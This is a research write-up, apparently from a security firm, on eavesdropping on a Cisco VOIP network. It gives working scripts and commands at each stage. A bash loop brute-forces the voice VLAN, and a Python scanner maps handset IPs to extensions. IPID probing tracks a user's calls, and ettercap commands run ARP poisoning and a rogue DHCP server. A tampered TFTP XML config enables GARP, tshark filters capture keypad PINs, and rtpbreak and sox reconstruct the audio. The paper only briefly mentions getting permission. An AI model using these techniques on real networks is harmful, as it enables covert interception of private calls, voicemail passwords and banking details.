info@hackprocess.com +61 (0)47 280 9177

VOIP Eavesdropping Research

INTRODUCTION

Originally written circa 2008–2010. The following paper describes my successful attempts to compromise the confidentiality of communications on a sample VOIP network. The network comprises the following equipment:

  • Handsets: Cisco 7941 (GARP Enabled)
  • Call Manager: Cisco Call Manager 7.1 - Signalling Protocol: SCCP
  • Switching: No Port Security features enabled

It would not be advisable to attempt these eavesdropping techniques on a live VOIP network without explicit permission. The primary full duplex attack (internal → internal) I'm describing lacks 'point and click' precision, although it does work. It is not uncommon for the phone to attempt to re-register itself for various reasons, in which case it will be unavailable for approximately three minutes.

For the attack to work in a practical way, it needs to be planned and premeditated. A certain degree of luck is also involved, though the more latitude you have with the infrastructure, the more you can swing the odds of consistent success in your favour.

Connecting to the Voice VLAN

Let us assume that we do not know the VLAN ID of the voice network we need to connect to. How can we find it? Without the luxury of asking the network administrator, or of reading the phones' network configuration settings (access to which may be disabled), we have two practical methods at our disposal.

The first method is to inspect CDP packets on the network. CDP should disclose the voice VLAN ID we're looking for, and any respectable sniffer can decode the packet that carries it.
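As a rough illustration of what the sniffer is decoding, the following Python sketch pulls the VLAN IDs out of a raw CDP frame. It assumes you already have the frame's bytes (for example, exported from a capture). The TLV type codes used here (0x000a Native VLAN, and 0x000e VoIP VLAN Reply with a 1-byte appliance ID before the 2-byte VLAN ID) reflect Wireshark's CDP dissector as I understand it, not anything stated in this research, so treat them as assumptions and verify them against your own capture.

```python
import struct

# LLC/SNAP header that precedes CDP in an IEEE 802.3 frame:
# DSAP/SSAP 0xAA, control 0x03, Cisco OUI 00:00:0C, protocol ID 0x2000.
CDP_SNAP = b"\xaa\xaa\x03\x00\x00\x0c\x20\x00"

# TLV type codes (assumed, per Wireshark's CDP dissector; verify locally).
TLV_NATIVE_VLAN = 0x000A
TLV_VOIP_VLAN_REPLY = 0x000E


def cdp_payload_from_frame(frame):
    """Strip the 14-byte 802.3 header and the 8-byte LLC/SNAP header."""
    if frame[14:22] != CDP_SNAP:
        raise ValueError("not a CDP frame")
    return frame[22:]


def parse_cdp_tlvs(payload):
    """Yield (type, value) pairs from a CDP PDU.

    The PDU starts with version (1 byte), TTL (1 byte) and checksum
    (2 bytes); each TLV's length field includes its own 4-byte header.
    """
    offset = 4
    while offset + 4 <= len(payload):
        tlv_type, tlv_len = struct.unpack("!HH", payload[offset:offset + 4])
        if tlv_len < 4 or offset + tlv_len > len(payload):
            break  # malformed or truncated TLV
        yield tlv_type, payload[offset + 4:offset + tlv_len]
        offset += tlv_len


def vlans_from_cdp(payload):
    """Return the native and voice VLAN IDs advertised in a CDP PDU, if any."""
    found = {}
    for tlv_type, value in parse_cdp_tlvs(payload):
        if tlv_type == TLV_NATIVE_VLAN and len(value) >= 2:
            found["native_vlan"] = struct.unpack("!H", value[:2])[0]
        elif tlv_type == TLV_VOIP_VLAN_REPLY and len(value) >= 3:
            # Assumed layout: 1-byte appliance ID, then a 2-byte VLAN ID.
            found["voice_vlan"] = struct.unpack("!H", value[1:3])[0]
    return found
```

If the voice VLAN TLV is absent, the switch is probably not advertising a voice VLAN on that port, and the brute-force method is the fallback.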

If CDP is not running, we have to make certain assumptions. In fact, we have to make them anyway if we want to connect to the voice VLAN, because we are assuming no prior knowledge of the switch's configuration or of any security controls put in place to stop us connecting to it, somewhat illegitimately.

The second method is essentially 'brute force'. An 802.1Q tag carries a 12-bit VLAN ID, so there are only 4094 usable VLAN IDs (0 and 4095 are reserved), a small enough space to enumerate. We guess the VLAN ID by cycling through the IDs systematically, configuring a virtual interface for each one and trying to obtain an address by DHCP. Chances are it will be somewhere between 1 and 100, and very likely under 1000. To speed the process up, you can use an alternative DHCP client whose timeout parameters can be tweaked. Also look for obvious clues, such as the third octet of the data LAN's IP addressing scheme being the same as, or close to, the voice VLAN ID.

These actions assume that our switch port is a member of a voice VLAN and that DHCP is servicing that network. Once 802.1Q support is compiled into our kernel, or loaded as a module (8021q on Linux), we can start cycling through VLAN IDs and requesting an address on each.

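#!/bin/bash
# Cycle through 802.1Q VLAN IDs, requesting a DHCP lease on each.
# Requires root and the 8021q kernel module (modprobe 8021q).
# vconfig is deprecated on modern systems; the iproute2 equivalent is
#   ip link add link eth0 name eth0.$VLANNUM type vlan id $VLANNUM

VLANNUM=2

while [ $VLANNUM -le 4094 ]; do
  vconfig add eth0 $VLANNUM
  # dhcpcd is a DHCP client (dhcpd is a server); -t sets the timeout in seconds
  if dhcpcd -t 5 eth0.$VLANNUM; then
    echo "Lease obtained on VLAN $VLANNUM"
    break
  fi
  vconfig rem eth0.$VLANNUM
  let VLANNUM=VLANNUM+1
done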
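The loop above tries VLAN IDs in numerical order, and every wrong guess costs one full DHCP timeout: over the 4093 IDs from 2 to 4094, a 5-second timeout means roughly 5.7 hours in the worst case and a 30-second timeout roughly 34 hours. Trying the likeliest IDs first therefore pays off. The sketch below orders candidates using the heuristics from the text (IDs near the data LAN's third octet, then 2-100, then 101-999, then the rest); the function name and the ±5 window are illustrative choices, not part of the original method.

```python
def candidate_vlans(data_third_octet=None, window=5):
    """Return VLAN IDs 2-4094 ordered so the likeliest guesses come first.

    VLAN 1 is skipped, as in the bash loop. If the third octet of the
    data LAN's addressing is known, IDs closest to it are tried first.
    """
    seen = set()
    order = []

    def add(ids):
        for vlan in ids:
            if 2 <= vlan <= 4094 and vlan not in seen:
                seen.add(vlan)
                order.append(vlan)

    if data_third_octet is not None:
        nearby = range(data_third_octet - window, data_third_octet + window + 1)
        # Closest first; ties go to the lower ID because sorted() is stable.
        add(sorted(nearby, key=lambda v: abs(v - data_third_octet)))
    add(range(2, 101))      # "somewhere between 1 and 100"
    add(range(101, 1000))   # "very likely under 1000"
    add(range(1000, 4095))  # everything else
    return order
```

The resulting list could replace the counter in the bash loop, e.g. by printing `" ".join(map(str, candidate_vlans(64)))` and iterating over it with `for VLANNUM in ...`.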

If you lease an IP address successfully, you may want to ARP scan the segment and check the OUI (the first three bytes) of each MAC address to confirm you're actually dealing with handsets and VOIP kit.
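A minimal sketch of the OUI check, assuming your ARP scanner gives you (IP, MAC) pairs. MAC addresses turn up in several notations (Cisco kit often prints the dotted form), so they are normalised before comparison. The vendor OUI list is yours to supply; the 00:1B:2A value in the usage note is simply taken from the handset MAC that appears in the keypad capture in this paper, not from an authoritative vendor registry.

```python
import re


def normalise_mac(mac):
    """Return a MAC address as 12 upper-case hex digits.

    Accepts colon, hyphen or Cisco dotted notation, e.g.
    00:1b:2a:c7:08:4b, 00-1B-2A-C7-08-4B or 001b.2ac7.084b.
    """
    digits = re.sub(r"[:.\-]", "", mac.strip())
    if not re.fullmatch(r"[0-9A-Fa-f]{12}", digits):
        raise ValueError(f"not a MAC address: {mac!r}")
    return digits.upper()


def oui(mac):
    """The OUI is the first three bytes (six hex digits) of the MAC address."""
    return normalise_mac(mac)[:6]


def filter_by_oui(hosts, vendor_ouis):
    """Keep (ip, mac) pairs from an ARP scan whose OUI is in vendor_ouis."""
    wanted = {re.sub(r"[:.\-]", "", o).upper() for o in vendor_ouis}
    return [(ip, mac) for ip, mac in hosts if oui(mac) in wanted]
```

For example, `filter_by_oui(scan_results, ["00:1B:2A"])` keeps only hosts whose MAC starts with that prefix; confirm any OUI against the IEEE registry before trusting it.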

Target Discovery

When we've successfully connected to the voice network, target selection at an IP level is straightforward. We merely choose, through conventional enumeration, the IP address or addresses we would like to monitor. This, unfortunately, will be no fun if you happen to choose handsets that provide 'low value' information, or relatively redundant or sparsely used handsets. What we want to do is target specific people of interest in the organisation, identified either positively or through their phone utilisation, as they are far more likely to provide valuable information.

A quick look at the available TCP services shows that the phones often run an HTTP daemon. It volunteers virtually everything of interest about the phone's configuration, including the extension it is mapped to. The following Python script, whilst not particularly elegant, will save you some time working out which IP addresses map to which extension numbers in a given IP address range.

#!/usr/bin/env python3
# Map handset IP addresses to extension numbers by scraping each phone's
# built-in HTTP page. Assumes the extension appears as a 4-digit number
# inside <b> tags.
# Usage: python3 looper.py 192.168.1.1-192.168.1.254

import sys
import ipaddress
from concurrent.futures import ThreadPoolExecutor

import requests
from bs4 import BeautifulSoup


def fetch_and_parse(ip):
    """Fetch the phone's web page and report any 4-digit bold numbers."""
    try:
        response = requests.get(f"http://{ip}", timeout=2)
        soup = BeautifulSoup(response.text, "html.parser")
        texts = (tag.get_text(strip=True) for tag in soup.find_all("b"))
        numbers = [t for t in texts if t.isdigit() and len(t) == 4]
        if numbers:
            return f"{ip} is Ext: {', '.join(numbers)}"
        return f"{ip} no 4-digit bold numbers found."
    except requests.RequestException as e:
        return f"{ip} error: {e}"


def ip_range(start_ip, end_ip):
    """Expand an inclusive start-end range into individual address strings."""
    start = int(ipaddress.IPv4Address(start_ip))
    end = int(ipaddress.IPv4Address(end_ip))
    return [str(ipaddress.IPv4Address(i)) for i in range(start, end + 1)]


if __name__ == "__main__":
    if len(sys.argv) != 2 or "-" not in sys.argv[1]:
        print("Usage: python3 looper.py 192.168.1.1-192.168.1.254")
        sys.exit(1)

    start_ip, end_ip = sys.argv[1].split("-")

    # Use threads for speed; map() returns results in input order
    with ThreadPoolExecutor(max_workers=10) as executor:
        for line in executor.map(fetch_and_parse, ip_range(start_ip, end_ip)):
            print(line)

Speculating Phone Utilisation With IPID

There are Cisco facilities that will happily compile and report call statistics for the relevant people. However, we can compile our own, in real time and with a surprisingly high degree of accuracy, from the IPv4 header alone. The Cisco phones I've experimented with use a single global, incrementing IPID counter, much like the IPv4 stacks of other unsophisticated operating systems. Every packet the phone sends advances the counter, so by probing the phone at regular intervals and noting how far the IPID has moved between replies, we can measure how many packets it sends in each state. These per-state packet counts are fairly consistent.

Armed with this knowledge, I believe it is relatively easy to plot a particular user's use of their IP phone. Not only can we detect when they pick the phone off the hook, we can also deduce their call lengths and whether the handset initiated or received the call. We can also guess how many digits they've dialled and possibly whether the call is local, national or international (based on the time differences between successive digits pressed). Here are the results of some experiments I conducted:

Picking the phone off the hook — IPID increment of 5:

HPING 10.64.0.18 (eth0.64 10.64.0.18): NO FLAGS are set, 40 headers + 0 data bytes

len=50 ip=10.64.0.18 ttl=32 id=1800 sport=0 flags=RA seq=8 win=8192 rtt=0.5 ms
len=50 ip=10.64.0.18 ttl=32 id=1801 sport=0 flags=RA seq=9 win=8192 rtt=0.5 ms
len=50 ip=10.64.0.18 ttl=32 id=1802 sport=0 flags=RA seq=10 win=8192 rtt=0.5 ms
len=50 ip=10.64.0.18 ttl=32 id=1807 sport=0 flags=RA seq=11 win=8192 rtt=0.5 ms - Phone off hook
len=50 ip=10.64.0.18 ttl=32 id=1808 sport=0 flags=RA seq=12 win=8192 rtt=0.5 ms
len=50 ip=10.64.0.18 ttl=32 id=1809 sport=0 flags=RA seq=13 win=8192 rtt=0.5 ms

Calling the extension remotely and hanging up remotely — IPID increment of 3:

HPING 10.64.0.18 (eth0.64 10.64.0.18): NO FLAGS are set, 40 headers + 0 data bytes

len=50 ip=10.64.0.18 ttl=32 id=5341 sport=0 flags=RA seq=0 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=5342 sport=0 flags=RA seq=1 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=5345 sport=0 flags=RA seq=2 win=8192 rtt=0.4 ms - Phone rings
len=50 ip=10.64.0.18 ttl=32 id=5346 sport=0 flags=RA seq=3 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=5347 sport=0 flags=RA seq=4 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=5350 sport=0 flags=RA seq=5 win=8192 rtt=0.4 ms - Call terminated
len=50 ip=10.64.0.18 ttl=32 id=5351 sport=0 flags=RA seq=6 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=5352 sport=0 flags=RA seq=7 win=8192 rtt=0.4 ms

Calling the extension (internal to internal), picking up the phone and having a quick conversation:

len=50 ip=10.64.0.18 ttl=32 id=8158 sport=0 flags=RA seq=13 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8159 sport=0 flags=RA seq=14 win=8192 rtt=0.5 ms - Phone rings
len=50 ip=10.64.0.18 ttl=32 id=8162 sport=0 flags=RA seq=15 win=8192 rtt=0.5 ms
len=50 ip=10.64.0.18 ttl=32 id=8163 sport=0 flags=RA seq=16 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8164 sport=0 flags=RA seq=17 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8165 sport=0 flags=RA seq=18 win=8192 rtt=0.5 ms
len=50 ip=10.64.0.18 ttl=32 id=8167 sport=0 flags=RA seq=19 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8168 sport=0 flags=RA seq=20 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8169 sport=0 flags=RA seq=21 win=8192 rtt=0.4 ms - Call Answered
len=50 ip=10.64.0.18 ttl=32 id=8174 sport=0 flags=RA seq=22 win=8192 rtt=0.4 ms - Conversation
len=50 ip=10.64.0.18 ttl=32 id=8223 sport=0 flags=RA seq=23 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8274 sport=0 flags=RA seq=24 win=8192 rtt=0.4 ms - IPID Inc ~50
len=50 ip=10.64.0.18 ttl=32 id=8326 sport=0 flags=RA seq=25 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8377 sport=0 flags=RA seq=26 win=8192 rtt=0.5 ms - Conversation

Summary of Phone Actions:

Phone Action                     IPID Increment
Taking the phone off the hook    5
Phone ringing                    3
Dialling a number                2-5 per digit (3 on average)
Call in progress                 ~50

An attacker could use this information to their advantage in a number of ways:

  • Identify the busiest handsets (and therefore ones likely to divulge interesting information)
  • Identify users who received but never answered calls (possibly indicating voicemails)
  • Determine which users are physically present on a given day

The analysis above should not be perceived as being surgically accurate. There are many factors that could easily throw your results and make them inaccurate. It is, nonetheless, an interesting observation to make.
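The summary table can be turned into a rough live monitor. The ~50 increment during a call fits what we would expect if hping is probing at its default one-second interval and the phone uses the common 20 ms packetisation, which produces 50 RTP packets per second; treat both as assumptions for your own network. The sketch below parses hping reply lines, computes the IPID delta between successive replies (modulo 2^16, so counter wrap-around is handled) and classifies each interval. The thresholds come from the table; because off-hook, ringing and digit presses overlap in the 2-5 range, it does not try to tell them apart.

```python
import re

# Matches the "id=1807" field in hping reply lines.
IPID_RE = re.compile(r"\bid=(\d+)")


def ipid_deltas(lines):
    """IPID differences between successive hping replies, modulo 2**16."""
    ids = []
    for line in lines:
        match = IPID_RE.search(line)
        if match:
            ids.append(int(match.group(1)))
    return [(b - a) % 65536 for a, b in zip(ids, ids[1:])]


def classify(delta):
    """Rough phone state for one probe interval (thresholds from the table).

    A delta of 1 is just the reply to our own probe. Off-hook, ringing
    and digit presses all fall in the 2-5 range, so they share a label.
    """
    if delta <= 1:
        return "idle"
    if delta <= 5:
        return "signalling"
    if delta >= 40:
        return "call in progress"
    return "unknown"


def watch(stream):
    """Print a classification for each new hping reply read from stream."""
    prev = None
    for line in stream:
        match = IPID_RE.search(line)
        if not match:
            continue
        cur = int(match.group(1))
        if prev is not None:
            delta = (cur - prev) % 65536
            print(f"id={cur} delta={delta} {classify(delta)}", flush=True)
        prev = cur
```

`watch()` can be fed hping's output line by line (for example, `watch(sys.stdin)` at the end of a pipe). Summing the "call in progress" intervals per handset gives a crude measure of how busy each one is.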

Half-Duplex Eavesdropping

Consider the composition of a standard VOIP deployment within an organisation (i.e. multiple VLANs for handsets and at least one for voice servers). If we want to intercept all voice streams to and from a handset, we need to cover a number of angles. Firstly, we need to be connected to the same voice VLAN as at least one of the parties involved in the call. Secondly, we need to be able to eavesdrop both on calls between handsets within our own network and on calls to handsets outside it, which pass through the default gateway.

To intercept packets between two hosts on the same segment, the standard approach is to poison the ARP caches of both hosts with gratuitous ARP replies. We can't do that here: Cisco has disabled the acceptance of gratuitous ARP replies on these handsets, so they simply ignore the packets. The setting can be viewed from the phone's Settings button. We either need to find a way of switching GARP acceptance back on, or perform the MITM/eavesdropping attack by other means.

One possibility at this point is to use a utility such as macof to fill the switch's CAM table, so that the switch floods all frames, including RTP, out of every port, ours included. We don't actually need to be in the middle of the conversation; we only want to listen to it.

Bearing in mind that the switch has no port security measures in place, nothing stops us from poisoning the ARP cache of the default gateway (10.10.1.1 in the command below), telling it that traffic for one host, or for the entire subnet, should now be forwarded through us.

This at least lets us intercept one half of the conversation for external calls, as well as voicemails being listened to on the targeted handset. I tried the most popular tool, arpspoof, for this and consistently caused the handsets to crash; I have not yet established why. ettercap generally proved much more versatile (although not without limitations and bugs, which I mention later).

ettercap -i eth0.10 -T -M arp:remote /10.10.1.50/ /10.10.1.1/

Full-Duplex Eavesdropping

To coerce the phone into sending packets to us, one option is to change the phone's default route.

DHCP Race Reply

The next step is to try to win a DHCP race between the legitimate DHCP server servicing that network and a rogue DHCP daemon I set up. If our reply reaches a requesting client first, we can alter the host's default route.

Using a standard DHCP server daemon as the rogue server wasn't cutting it, so I decided to try ettercap. There are other tools you can use for this (and I found ettercap would crash consistently under certain circumstances), but they either lacked capabilities (e.g. wesley) or lacked intuitiveness and documentation (e.g. yersinia).

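The following command sets up our fake DHCP server. In ettercap's dhcp:ip_pool/netmask/dns syntax, the last field is the DNS server handed to clients; ettercap offers its own address as the default gateway, which is what redirects the phone's traffic to us: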

ettercap -i eth0.10 -T -M dhcp:10.10.1.100,101-150/255.255.0.0/10.10.1.1

On my network I was winning the race about 50% of the time. That was against a multi-purpose AD/DNS/DHCP server provisioning DHCP from a different network. A 50% success rate is not enough to satisfy me, but it is also not that bad. The phone's DHCP lease does expire naturally every five days.

If we want to, we can attempt to DoS the phone and stress the DHCP server slightly at the same time to increase our success rate; we only need a few additional milliseconds. Surprisingly, when DHCP services were moved away from this server and handed directly to the switch, I won the DHCP race 100% of the time. I had expected a DHCP ACK generated within the switch to reach the requesting device faster than one sent down the wire from another host.

Once we have won the race, we have a Layer 3 connection from the handset to our monitoring host, and a Layer 2 connection from the real default gateway to our monitoring host (posing as the handset).

If we wanted to, we could use iptables to NAT the handset's packets as they pass through us, doing away with the need to pose as the handset via ARP spoofing: our host would keep the state table, and as far as the real default gateway is concerned, we are the one doing the 'talking'.

Intercepting Voicemail Passwords

In addition to voice conversations, we may be interested in voicemail passwords or other PINs. The following tshark command, using a Wireshark filter expression, decodes which buttons a user is pressing. This will, of course, reveal the numbers they dial, voicemail passwords, telephone banking details, etc. With a few pipes and grep commands, it would not be difficult to look up dialled numbers on Google automatically and try to establish exactly whom the user has called.

tshark -V -r voicemail.pcap skinny.stationKeypadButton | grep -e "Source:" -e "KeypadButton:"
Source: 00:1b:2a:c7:08:4b (00:1b:2a:c7:08:4b)
Source: 10.10.1.50 (10.64.0.85)
KeypadButton: One (0x00000001)
Source: 00:1b:2a:c7:08:4b (00:1b:2a:c7:08:4b)
Source: 10.10.1.50 (10.64.0.85)
KeypadButton: Two (0x00000002)
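To collapse the decoded keypad events into a single string, a small Python filter over the grep output is enough. This is a sketch that assumes the "KeypadButton: Name (0x...)" line format shown above; it maps values 0-9 to digits and prints '?' for anything else, since the codes for keys such as * and # do not appear in this capture and are not guessed here.

```python
import re

# Matches tshark -V lines such as "KeypadButton: One (0x00000001)".
KEYPAD_RE = re.compile(r"KeypadButton:\s*\S+\s*\(0x([0-9A-Fa-f]+)\)")


def keypad_digits(lines):
    """Collapse decoded Skinny keypad events into one string.

    Values 0-9 become digits; any other value is shown as '?' because
    its mapping is not confirmed by the capture.
    """
    out = []
    for line in lines:
        match = KEYPAD_RE.search(line)
        if match:
            value = int(match.group(1), 16)
            out.append(str(value) if value <= 9 else "?")
    return "".join(out)
```

Because `keypad_digits` accepts any iterable of lines, it can be given `sys.stdin` at the end of the tshark/grep pipeline; the "Source:" lines are simply skipped.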

Enabling GARP

At this point we can monitor communications into and out of our network from an identified handset. If we also want to monitor communications between handsets on the same LAN, we can follow the next steps. Having won a DHCP race, we have already changed the phone's default route to our own host.

If the DHCP ACK does not specify a TFTP server (Cisco phones normally learn it from DHCP option 150), the phone falls back to downloading its XML configuration file by TFTP from the default gateway it has just been given. Many of the phone's settings can be configured in this file, including our GARP setting.

<settingsAccess>1</settingsAccess><garp>1</garp><voiceVlanAccess>0</voiceVlanAccess>

Next, we manually fetch the phone's original XML file from the legitimate TFTP server with a TFTP client and modify it. We then set up our own TFTP server on the address we handed out as the rogue default route and place the modified XML file in its serving directory.

With this prepared ahead of time, the phone will happily download its new configuration from our own TFTP server. If you check the settings on your phone, you should be able to confirm that GARP is now enabled.

Full Duplex ARP Cache Poisoning

At this point we should control the default route of at least two phones on the same segment whose conversations we want to monitor. Although we can observe data traversing the default route, we can't hear their conversation, because two phones on the same segment exchange RTP packets directly once SCCP has set up the call and never need the default gateway. With GARP now enabled, a full-duplex ARP cache poison should work:

ettercap -i eth0.10 -T -M arp:oneway /10.10.1.50/ /10.10.1.60/
ettercap -i eth0.10 -T -M arp:oneway /10.10.1.60/ /10.10.1.50/

Listening to Users' Conversations

Audio is sampled with one of various codecs, wrapped up in RTP packets and sent to its destination over UDP. Decoding it can, depending on the circumstances, be somewhat tricky. The one tool that worked consistently for me was rtpbreak.

I tried in vain to make vomit and rtptools work for my needs; unfortunately, these tools tended to segfault consistently with minimal provocation, and they also lacked flexibility and/or documentation. I was also incredibly frustrated with the RTP decoding mechanism in Wireshark, which, despite having been around for several years, is still incredibly poor.

My experience indicated that if you're dealing with codecs other than G711u, you’ll probably run into some kind of frustration while decoding or playing it. Often, it's not just one codec used either — one codec may be used for internal calls, another for WAN links, and yet another for external calls to mobiles or landlines.

I did discover one way to try to keep G711u as the default codec. The phone's XML configuration file (discussed earlier) contains two fields that control G722 support; setting both values from 1 to 0 may help:

<g722CodecSupport>1</g722CodecSupport>
<advertiseG722Codec>1</advertiseG722Codec>
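If you are already editing the phone's XML file for the TFTP step, the change can be scripted. The sketch below uses Python's standard ElementTree to set the two G722 fields to 0 wherever they occur in the file, since their exact nesting in a real configuration file is not shown here. The function names are illustrative; note that ElementTree drops XML comments and the XML declaration when it re-serialises the document, so diff the result against the original before serving it.

```python
import xml.etree.ElementTree as ET

# The two G722 fields named in the text, set to 0 to discourage G722.
G722_OFF = {"g722CodecSupport": "0", "advertiseG722Codec": "0"}


def set_config_values(xml_text, settings):
    """Return xml_text with the text of every element named in settings replaced.

    Elements are matched by tag anywhere in the tree. A KeyError is raised
    if a named element is missing, so a typo does not silently leave the
    file unchanged.
    """
    root = ET.fromstring(xml_text)
    for tag, value in settings.items():
        matches = list(root.iter(tag))
        if not matches:
            raise KeyError(f"<{tag}> not found in configuration")
        for elem in matches:
            elem.text = value
    return ET.tostring(root, encoding="unicode")


def patch_file(src_path, dst_path, settings=G722_OFF):
    """Read a configuration file, apply settings and write the result."""
    with open(src_path, "rb") as f:
        patched = set_config_values(f.read(), settings)
    with open(dst_path, "w", encoding="utf-8") as f:
        f.write(patched)
```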

Once RTP data is being intercepted, the following sequence of commands should recover the telephone conversation:

rtpbreak -i eth0.10 -g -m

sox -r8000 -c1 -t ul rtp.0.0.raw -t wav 0.wav
sox -r8000 -c1 -t ul rtp.0.1.raw -t wav 1.wav
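sox -m 0.wav 1.wav call.wav

The -m flag mixes the two legs of the call together; without it, sox concatenates the files, so you would hear one side of the call followed by the other. The file call.wav can then be played using any audio player that supports WAV format.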
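Where sox is not available, the same conversion can be sketched in pure Python with the standard G.711 μ-law decoding algorithm. This assumes, as the sox commands imply, that rtpbreak's rtp.*.raw files contain headerless 8 kHz μ-law audio; it applies to G711u only, not to other codecs. The two legs are mixed by averaging sample by sample, which keeps the result inside the 16-bit range. Neither this nor sox aligns the legs in time, so if one stream started later, the two sides may be slightly offset.

```python
import struct
import wave


def ulaw_to_linear(byte):
    """Decode one G.711 mu-law byte to a signed 16-bit PCM sample."""
    u = ~byte & 0xFF            # mu-law code words are stored bit-inverted
    sign = u & 0x80
    exponent = (u >> 4) & 0x07
    mantissa = u & 0x0F
    magnitude = (((mantissa << 3) + 0x84) << exponent) - 0x84  # 0x84 = bias 132
    return -magnitude if sign else magnitude


def decode_ulaw(raw):
    """Decode a headerless mu-law byte string into a list of samples."""
    return [ulaw_to_linear(b) for b in raw]


def mix(a, b):
    """Average two mono legs sample by sample, padding the shorter with silence."""
    n = max(len(a), len(b))
    a = a + [0] * (n - len(a))
    b = b + [0] * (n - len(b))
    return [(x + y) // 2 for x, y in zip(a, b)]


def write_wav(path, samples, rate=8000):
    """Write mono 16-bit little-endian PCM samples to a WAV file."""
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(struct.pack(f"<{len(samples)}h", *samples))


def convert_call(leg0_path, leg1_path, out_path):
    """Decode both raw legs written by rtpbreak and mix them into one WAV."""
    with open(leg0_path, "rb") as f0, open(leg1_path, "rb") as f1:
        leg0, leg1 = decode_ulaw(f0.read()), decode_ulaw(f1.read())
    write_wav(out_path, mix(leg0, leg1))
```

For example, `convert_call("rtp.0.0.raw", "rtp.0.1.raw", "call.wav")` mirrors the sox pipeline for the file names used above.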